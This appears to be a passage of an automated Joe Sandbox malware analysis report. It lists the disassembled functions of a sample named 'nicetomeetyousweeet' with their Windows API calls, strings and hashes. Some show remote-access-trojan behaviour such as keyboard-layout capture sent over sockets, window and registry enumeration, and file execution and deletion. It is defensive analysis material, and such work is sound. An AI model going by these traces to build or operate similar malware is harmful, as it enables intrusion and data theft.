                                                                                • Instruction Fuzzy Hash: 4A41D532E002049FEB24DF79C881A5EB3A5EF89718F15856EE915EB341DB35EE01CB84
                                                                                Function 007C32FF Relevance: 7.6, APIs: 5, Instructions: 129COMMONLIBRARYCODE
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4146476987.0000000000780000.00000040.00001000.00020000.00000000.sdmp, Offset: 00780000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_780000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: _free
                                                                                • String ID:
                                                                                • API String ID: 269201875-0
                                                                                • Opcode ID: f0a2e76299140c1b889b6a2776586b742041be663085ede9ef76686f57abf0cb
                                                                                • Instruction ID: c82eb73510f99976d0e3a82697a6de468fda19a7550a363064d6d50746aac493
                                                                                • Opcode Fuzzy Hash: f0a2e76299140c1b889b6a2776586b742041be663085ede9ef76686f57abf0cb
                                                                                • Instruction Fuzzy Hash: B2419032A00214EBCB24DF78C885F6DB7A6EF88714B1585ADE515EB391DA35AE01CB40
                                                                                Function 0044FED3 Relevance: 7.6, APIs: 5, Instructions: 110COMMONLIBRARYCODE
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,0043E3ED,?,00000000,?,00000001,?,?,00000001,0043E3ED,?), ref: 0044FF20
                                                                                • __alloca_probe_16.LIBCMT ref: 0044FF58
                                                                                • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 0044FFA9
                                                                                • GetStringTypeW.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,004399BF,?), ref: 0044FFBB
                                                                                • __freea.LIBCMT ref: 0044FFC4
                                                                                  • Part of subcall function 00446AFF: RtlAllocateHeap.NTDLL(00000000,00434403,?,?,00437227,?,?,?,?,?,0040CC87,00434403,?,?,?,?), ref: 00446B31
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4145931903.0000000000400000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.4145931903.0000000000473000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000006.00000002.4145931903.0000000000476000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ByteCharMultiWide$AllocateHeapStringType__alloca_probe_16__freea
                                                                                • String ID:
                                                                                • API String ID: 313313983-0
                                                                                • Opcode ID: 32ac3bd373e466217b4644ebee2ff76607fe703c26dcd28c1e1d2c5ecdebf3ce
                                                                                • Instruction ID: fd0d2a6e26420063bd1679c32ed8e9021f1b2be81e6a043fb7466d0fa567ef17
                                                                                • Opcode Fuzzy Hash: 32ac3bd373e466217b4644ebee2ff76607fe703c26dcd28c1e1d2c5ecdebf3ce
                                                                                • Instruction Fuzzy Hash: 9831FE32A0021AABEF248F65DC41EAF7BA5EB05314F05017BFC04D6290EB39DD58CBA4
                                                                                Function 0044E13B Relevance: 7.6, APIs: 5, Instructions: 68COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetEnvironmentStringsW.KERNEL32 ref: 0044E144
                                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0044E167
                                                                                  • Part of subcall function 00446AFF: RtlAllocateHeap.NTDLL(00000000,00434403,?,?,00437227,?,?,?,?,?,0040CC87,00434403,?,?,?,?), ref: 00446B31
                                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0044E18D
                                                                                • _free.LIBCMT ref: 0044E1A0
                                                                                • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0044E1AF
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4145931903.0000000000400000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.4145931903.0000000000473000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000006.00000002.4145931903.0000000000476000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                                                                • String ID:
                                                                                • API String ID: 336800556-0
                                                                                • Opcode ID: 4bdc18aade4f5afa9f676aa8b8aa9a2318643a84ce2148a0478020116eae0cde
                                                                                • Instruction ID: 38685928f53d0fdec7f9771a1fbcf5508afe04d06d5fe5a1692e2fd93afee85f
                                                                                • Opcode Fuzzy Hash: 4bdc18aade4f5afa9f676aa8b8aa9a2318643a84ce2148a0478020116eae0cde
                                                                                • Instruction Fuzzy Hash: 8201B1726417117F73215ABB6C8CC7B6A6DEEC2BA2315013ABD04D6201DA788C0291B9
                                                                                Function 007CE3A2 Relevance: 7.6, APIs: 5, Instructions: 68COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetEnvironmentStringsW.KERNEL32 ref: 007CE3AB
                                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 007CE3CE
                                                                                  • Part of subcall function 007C6D66: RtlAllocateHeap.NTDLL(00000000,007B468A,?), ref: 007C6D98
                                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 007CE3F4
                                                                                • _free.LIBCMT ref: 007CE407
                                                                                • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 007CE416
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4146476987.0000000000780000.00000040.00001000.00020000.00000000.sdmp, Offset: 00780000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_780000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                                                                • String ID:
                                                                                • API String ID: 336800556-0
                                                                                • Opcode ID: a9616c8c015984253ca72814521cc13fd9597de4e0bdad696dd641cecd3264f2
                                                                                • Instruction ID: 0ddf67b54fc2070b7f438e8901bc75e2d75f96d1a8ff611f9c5c248101b58eb3
                                                                                • Opcode Fuzzy Hash: a9616c8c015984253ca72814521cc13fd9597de4e0bdad696dd641cecd3264f2
                                                                                • Instruction Fuzzy Hash: 42018472605795BB272516B66C8CE7F7B6DDEC2FA1315013DFD04C3202EA69CD0291B1
                                                                                Function 00446F43 Relevance: 7.6, APIs: 5, Instructions: 53COMMONLIBRARYCODE
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetLastError.KERNEL32(00434403,00434403,?,00445359,00446B42,?,?,00437227,?,?,?,?,?,0040CC87,00434403,?), ref: 00446F48
                                                                                • _free.LIBCMT ref: 00446F7D
                                                                                • _free.LIBCMT ref: 00446FA4
                                                                                • SetLastError.KERNEL32(00000000,?,00434403), ref: 00446FB1
                                                                                • SetLastError.KERNEL32(00000000,?,00434403), ref: 00446FBA
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4145931903.0000000000400000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.4145931903.0000000000473000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000006.00000002.4145931903.0000000000476000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ErrorLast$_free
                                                                                • String ID:
                                                                                • API String ID: 3170660625-0
                                                                                • Opcode ID: d9a11e8b10a3382acc57acd06360e0df9f500200efacd02ff515e0ca4c66fe47
                                                                                • Instruction ID: 6bd692df8320938abc1815071491dbd9703328d73d2f54107518a18b095bb187
                                                                                • Opcode Fuzzy Hash: d9a11e8b10a3382acc57acd06360e0df9f500200efacd02ff515e0ca4c66fe47
                                                                                • Instruction Fuzzy Hash: 7401D13620C70067F61266757C85D2F266DDBC3B66727013FF958A2292EE2CCC0A452F
                                                                                Function 007C71AA Relevance: 7.6, APIs: 5, Instructions: 53COMMONLIBRARYCODE
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetLastError.KERNEL32(?,00000000,00000000,007BAA29,00000000,?,?,007BAAAD,00000000,00000000,00000000,00000000,00000000,00000000,00782E6F,?), ref: 007C71AF
                                                                                • _free.LIBCMT ref: 007C71E4
                                                                                • _free.LIBCMT ref: 007C720B
                                                                                • SetLastError.KERNEL32(00000000), ref: 007C7218
                                                                                • SetLastError.KERNEL32(00000000), ref: 007C7221
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4146476987.0000000000780000.00000040.00001000.00020000.00000000.sdmp, Offset: 00780000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_780000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ErrorLast$_free
                                                                                • String ID:
                                                                                • API String ID: 3170660625-0
                                                                                • Opcode ID: d9a11e8b10a3382acc57acd06360e0df9f500200efacd02ff515e0ca4c66fe47
                                                                                • Instruction ID: 1ec3e30190d09aef83f92c0ea65adeef859f1e2349bce607972544a6fd6bd28d
                                                                                • Opcode Fuzzy Hash: d9a11e8b10a3382acc57acd06360e0df9f500200efacd02ff515e0ca4c66fe47
                                                                                • Instruction Fuzzy Hash: 0901863624C705A7861A26347C89F2F2B6DEBC1771729013DF519E2192EE7DCD01D915
                                                                                Function 0041B37D Relevance: 7.5, APIs: 5, Instructions: 47COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0041B395
                                                                                • OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0041B3A8
                                                                                • GetProcessImageFileNameW.PSAPI(00000000,?,00000104,?,00000000,00000000,00000000), ref: 0041B3C8
                                                                                • CloseHandle.KERNEL32(00000000,?,00000000,00000000,00000000), ref: 0041B3D3
                                                                                • CloseHandle.KERNEL32(00000000,?,00000000,00000000,00000000), ref: 0041B3DB
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4145931903.0000000000400000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.4145931903.0000000000473000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000006.00000002.4145931903.0000000000476000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Process$CloseHandleOpen$FileImageName
                                                                                • String ID:
                                                                                • API String ID: 2951400881-0
                                                                                • Opcode ID: 28db66d1b44df5a4a13f2ee1d3f58b4d8ccd2cd96a3d097fa0993d4b776b664c
                                                                                • Instruction ID: bb9aee54fd4b55ef2446b45ef4d52834339351c189d8e7c886657dc3bd6b5f1d
                                                                                • Opcode Fuzzy Hash: 28db66d1b44df5a4a13f2ee1d3f58b4d8ccd2cd96a3d097fa0993d4b776b664c
                                                                                • Instruction Fuzzy Hash: 2FF04971204209ABD3106754AC4AFA7B27CDB40B96F000037FA61D22A1FFB4CCC146AE
                                                                                Function 0079B5E4 Relevance: 7.5, APIs: 5, Instructions: 47COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0079B5FC
                                                                                • OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0079B60F
                                                                                • GetProcessImageFileNameW.PSAPI(00000000,?,00000104,?,00000000,00000000,00000000), ref: 0079B62F
                                                                                • CloseHandle.KERNEL32(00000000,?,00000000,00000000,00000000), ref: 0079B63A
                                                                                • CloseHandle.KERNEL32(00000000,?,00000000,00000000,00000000), ref: 0079B642
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4146476987.0000000000780000.00000040.00001000.00020000.00000000.sdmp, Offset: 00780000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_780000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Process$CloseHandleOpen$FileImageName
                                                                                • String ID:
                                                                                • API String ID: 2951400881-0
                                                                                • Opcode ID: 51a17e5294b38f17d5f3a71b1001121c929f89ba237b4680bf25dfaaaa51ef0d
                                                                                • Instruction ID: d81eab114a555c6ea10489bcddd36636285de80e46485722dc1bf24e16e0099a
                                                                                • Opcode Fuzzy Hash: 51a17e5294b38f17d5f3a71b1001121c929f89ba237b4680bf25dfaaaa51ef0d
                                                                                • Instruction Fuzzy Hash: 8BF02871204315ABEB116798BD4EF7BB26CDB84B92F100076F616D21A2EFB4EC814676
                                                                                Function 0044F79D Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • _free.LIBCMT ref: 0044F7B5
                                                                                  • Part of subcall function 00446AC5: HeapFree.KERNEL32(00000000,00000000,?,0044FA50,?,00000000,?,00000000,?,0044FCF4,?,00000007,?,?,00450205,?), ref: 00446ADB
                                                                                  • Part of subcall function 00446AC5: GetLastError.KERNEL32(?,?,0044FA50,?,00000000,?,00000000,?,0044FCF4,?,00000007,?,?,00450205,?,?), ref: 00446AED
                                                                                • _free.LIBCMT ref: 0044F7C7
                                                                                • _free.LIBCMT ref: 0044F7D9
                                                                                • _free.LIBCMT ref: 0044F7EB
                                                                                • _free.LIBCMT ref: 0044F7FD
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4145931903.0000000000400000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.4145931903.0000000000473000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000006.00000002.4145931903.0000000000476000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: _free$ErrorFreeHeapLast
                                                                                • String ID:
                                                                                • API String ID: 776569668-0
                                                                                • Opcode ID: 24d082c4c32556380d94a426a0797d769337f58152c77e2724906da83e703e03
                                                                                • Instruction ID: 78b16e2cd2bc6e4547488c8f4e3d182d22cf8911186b8f77a4a783cd10448158
                                                                                • Opcode Fuzzy Hash: 24d082c4c32556380d94a426a0797d769337f58152c77e2724906da83e703e03
                                                                                • Instruction Fuzzy Hash: 9AF01232505600BBE620EB59E8C5C1773E9EB827147A9482BF408F7641CB3DFCC48A6C
                                                                                Function 007CFA04 Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • _free.LIBCMT ref: 007CFA1C
                                                                                  • Part of subcall function 007C6D2C: HeapFree.KERNEL32(00000000,00000000,?,007CFCB7,?,00000000,?,00000000,?,007CFF5B,?,00000007,?,?,007D046C,?), ref: 007C6D42
                                                                                  • Part of subcall function 007C6D2C: GetLastError.KERNEL32(?,?,007CFCB7,?,00000000,?,00000000,?,007CFF5B,?,00000007,?,?,007D046C,?,?), ref: 007C6D54
                                                                                • _free.LIBCMT ref: 007CFA2E
                                                                                • _free.LIBCMT ref: 007CFA40
                                                                                • _free.LIBCMT ref: 007CFA52
                                                                                • _free.LIBCMT ref: 007CFA64
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4146476987.0000000000780000.00000040.00001000.00020000.00000000.sdmp, Offset: 00780000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_780000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: _free$ErrorFreeHeapLast
                                                                                • String ID:
                                                                                • API String ID: 776569668-0
                                                                                • Opcode ID: 24d082c4c32556380d94a426a0797d769337f58152c77e2724906da83e703e03
                                                                                • Instruction ID: d1d45bdb751f341cba2b64f8a109d533acf202353124a5898f04c56274caa11c
                                                                                • Opcode Fuzzy Hash: 24d082c4c32556380d94a426a0797d769337f58152c77e2724906da83e703e03
                                                                                • Instruction Fuzzy Hash: 68F0B232605604EB8A64EB64F8C5E1AB7EBEA05710794982DF44DD7551CB3AFCC0C654
                                                                                Function 00416751 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 182threadwindowCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetWindowThreadProcessId.USER32(?,?), ref: 00416768
                                                                                • GetWindowTextW.USER32(?,?,0000012C), ref: 0041679A
                                                                                • IsWindowVisible.USER32(?), ref: 004167A1
                                                                                  • Part of subcall function 0041B37D: OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0041B395
                                                                                  • Part of subcall function 0041B37D: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0041B3A8
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4145931903.0000000000400000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.4145931903.0000000000473000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000006.00000002.4145931903.0000000000476000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ProcessWindow$Open$TextThreadVisible
                                                                                • String ID: (FG
                                                                                • API String ID: 3142014140-2273637114
                                                                                • Opcode ID: b66b3e9f27bfc03711d62459d1c25f5097fb36fde86d135e8370824b6e749363
                                                                                • Instruction ID: 6337817d5adb2ff800b6fe7f9081d1b6a06097940366009b721c4d78a1625a25
                                                                                • Opcode Fuzzy Hash: b66b3e9f27bfc03711d62459d1c25f5097fb36fde86d135e8370824b6e749363
                                                                                • Instruction Fuzzy Hash: FD71E6321082414AC325FB61D8A5ADFB3E4AFE4319F50453EF58A530E1EF746A49C79A
                                                                                Function 007969B8 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 182threadwindowCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetWindowThreadProcessId.USER32(?,?), ref: 007969CF
                                                                                • GetWindowTextW.USER32(?,?,0000012C), ref: 00796A01
                                                                                • IsWindowVisible.USER32(?), ref: 00796A08
                                                                                  • Part of subcall function 0079B5E4: OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0079B5FC
                                                                                  • Part of subcall function 0079B5E4: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0079B60F
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4146476987.0000000000780000.00000040.00001000.00020000.00000000.sdmp, Offset: 00780000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_780000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ProcessWindow$Open$TextThreadVisible
                                                                                • String ID: (FG
                                                                                • API String ID: 3142014140-2273637114
                                                                                • Opcode ID: c7140c968b57e192add68dc6676992042de4a480ef872d90ee77a690e46fad53
                                                                                • Instruction ID: ae05cbd45c510eab84bd40755fd61f3c9660941beaf7a432bdc38e902456dbda
                                                                                • Opcode Fuzzy Hash: c7140c968b57e192add68dc6676992042de4a480ef872d90ee77a690e46fad53
                                                                                • Instruction Fuzzy Hash: 7C711931588244DEC365FB24D969EEFB3A4EF94301F50452DF58A82163EF386A4ACB52
                                                                                Function 00792C11 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 173registryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • RegQueryInfoKeyW.ADVAPI32(?,?,?,00000000,?,?,?,?,?,?,?,?), ref: 00792C84
                                                                                • RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,?,?,?,?,00000000,?,?,?,?), ref: 00792CB3
                                                                                • RegEnumValueW.ADVAPI32(?,00000000,?,?,00000000,?,?,00002710,?,?,?,00000000,?,?,?,?), ref: 00792D54
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4146476987.0000000000780000.00000040.00001000.00020000.00000000.sdmp, Offset: 00780000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_780000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Enum$InfoQueryValue
                                                                                • String ID: DG
                                                                                • API String ID: 3554306468-2560412334
                                                                                • Opcode ID: bddf4943656ecba2bd9c39908ecfff909f44732c8dc369bfccc853cd4406e952
                                                                                • Instruction ID: 9312e035d5650cfac82ca10c693f39f7c20c43d55497f9df90b45624a546c0bd
                                                                                • Opcode Fuzzy Hash: bddf4943656ecba2bd9c39908ecfff909f44732c8dc369bfccc853cd4406e952
                                                                                • Instruction Fuzzy Hash: AA510F72148344EFD311FB64D849DABB7ECEF84700F50492EB695D2152EB78EA09CB62
                                                                                Function 004095D6 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 158COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetKeyboardLayoutNameA.USER32(?), ref: 00409601
                                                                                  • Part of subcall function 004041F1: socket.WS2_32(00000002,00000001,00000006), ref: 00404212
                                                                                  • Part of subcall function 0040428C: connect.WS2_32(?,006BB748,00000010), ref: 004042A5
                                                                                  • Part of subcall function 0041B6AA: CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000,?,00000000,00409689,00473EE8,?,00473EE8,00000000,00473EE8,00000000), ref: 0041B6BF
                                                                                  • Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4145931903.0000000000400000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.4145931903.0000000000473000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000006.00000002.4145931903.0000000000476000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CreateFileKeyboardLayoutNameconnectsendsocket
                                                                                • String ID: XCG$`AG$>G
                                                                                • API String ID: 2334542088-2372832151
                                                                                • Opcode ID: 32483e4998e3cf9ddc1f2833a18731a690a227b543fb70c909ebd3c703c2f8ba
                                                                                • Instruction ID: 7adbea44916697806613a62f0197ef330eb15d5bc584e2d7fa9685cab7613629
                                                                                • Opcode Fuzzy Hash: 32483e4998e3cf9ddc1f2833a18731a690a227b543fb70c909ebd3c703c2f8ba
                                                                                • Instruction Fuzzy Hash: 865143321042405BC325F775D8A2AEF73D5AFE4308F50483FF84A671E2EE785949C69A
                                                                                Function 0078983D Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 158COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetKeyboardLayoutNameA.USER32(?), ref: 00789868
                                                                                  • Part of subcall function 00784458: socket.WS2_32(006AF6E0,00000001,00000006), ref: 00784479
                                                                                  • Part of subcall function 007844F3: connect.WS2_32(?,00000000,00000000), ref: 0078450C
                                                                                  • Part of subcall function 0079B911: CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000,?,00000000,007898F0,00473EE8,?,00473EE8,00000000,00473EE8,00000000), ref: 0079B926
                                                                                  • Part of subcall function 007846CF: send.WS2_32(?,00000000,00000000,00000000), ref: 00784764
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4146476987.0000000000780000.00000040.00001000.00020000.00000000.sdmp, Offset: 00780000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_780000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CreateFileKeyboardLayoutNameconnectsendsocket
                                                                                • String ID: XCG$`AG$>G
                                                                                • API String ID: 2334542088-2372832151
                                                                                • Opcode ID: 57430c91427567827473bab5627dcff1f7b98a8ead265141081511e002c0e5a5
                                                                                • Instruction ID: d0e1531ab47ffbb4993f98a2d21c3ce7578752ed7bed8f88c6a1475d4eb5dcbb
                                                                                • Opcode Fuzzy Hash: 57430c91427567827473bab5627dcff1f7b98a8ead265141081511e002c0e5a5
                                                                                • Instruction Fuzzy Hash: 01513231688244DFC369F724D869AEFB395EF94301F50482DF54A82193EE38994BCB56
                                                                                Function 007844F3 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 147networkCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • connect.WS2_32(?,00000000,00000000), ref: 0078450C
                                                                                • WSAGetLastError.WS2_32(?,?,?,00781B92), ref: 0078464E
                                                                                  • Part of subcall function 0079A8ED: GetLocalTime.KERNEL32(00000000), ref: 0079A907
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4146476987.0000000000780000.00000040.00001000.00020000.00000000.sdmp, Offset: 00780000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_780000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ErrorLastLocalTimeconnect
                                                                                • String ID: Connection Failed: $TLS Handshake... |
                                                                                • API String ID: 227477821-1510355367
                                                                                • Opcode ID: 62f3c4882b49c5ff5d63aa71430f88bee7d31ae11dd357ee521aebef95a1510e
                                                                                • Instruction ID: c5fca7cb4f8c7de71bf3e0e5a1a21a242757439ba5f29aa61b0f67b7dbf7346f
                                                                                • Opcode Fuzzy Hash: 62f3c4882b49c5ff5d63aa71430f88bee7d31ae11dd357ee521aebef95a1510e
                                                                                • Instruction Fuzzy Hash: B6415731F80702F78A14B779880FA2D7A55AB82350F600259F90243693FE9DAC2587E7
                                                                                Function 00796863 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 103sleepfileCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • ShellExecuteW.SHELL32(00000000,0046559C,0046BA00,00000000,00000000,00000000), ref: 007968C3
                                                                                  • Part of subcall function 0079B881: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,00000000,?,?,00000000,00783D5A,00465324), ref: 0079B89A
                                                                                • Sleep.KERNEL32(00000064), ref: 007968EF
                                                                                • DeleteFileW.KERNEL32(00000000), ref: 00796923
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4146476987.0000000000780000.00000040.00001000.00020000.00000000.sdmp, Offset: 00780000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_780000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: File$CreateDeleteExecuteShellSleep
                                                                                • String ID: /t
                                                                                • API String ID: 1462127192-3161277685
                                                                                • Opcode ID: bb2c0f94cc430c17f8d99c3ea8886f75899e052070629971ff6dc793af8fbd9b
                                                                                • Instruction ID: a81d6545fbef6c772ed4b4934cafdeac9b5c3b70a5a5a6ffecd5c70ec0ff2b2f
                                                                                • Opcode Fuzzy Hash: bb2c0f94cc430c17f8d99c3ea8886f75899e052070629971ff6dc793af8fbd9b
                                                                                • Instruction Fuzzy Hash: 52318531980209DADB18FBA0DC9AEED7734EF10301F404169F50667192EF685A8BCB95
                                                                                Function 00403A10 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 92sleepCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00403A2A
                                                                                  • Part of subcall function 0041AB38: GetCurrentProcessId.KERNEL32(00000000,74DF3530,00000000,?,?,?,?,00465900,0040C07B,.vbs,?,?,?,?,?,004742F8), ref: 0041AB5F
                                                                                  • Part of subcall function 004176B6: CloseHandle.KERNEL32(00403AB9,?,?,00403AB9,00465324), ref: 004176CC
                                                                                  • Part of subcall function 004176B6: CloseHandle.KERNEL32($SF,?,?,00403AB9,00465324), ref: 004176D5
                                                                                  • Part of subcall function 0041B61A: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,00409F65), ref: 0041B633
                                                                                • Sleep.KERNEL32(000000FA,00465324), ref: 00403AFC
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4145931903.0000000000400000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.4145931903.0000000000473000.00000040.00000001.01000000.0000000C.sdmpDownload File
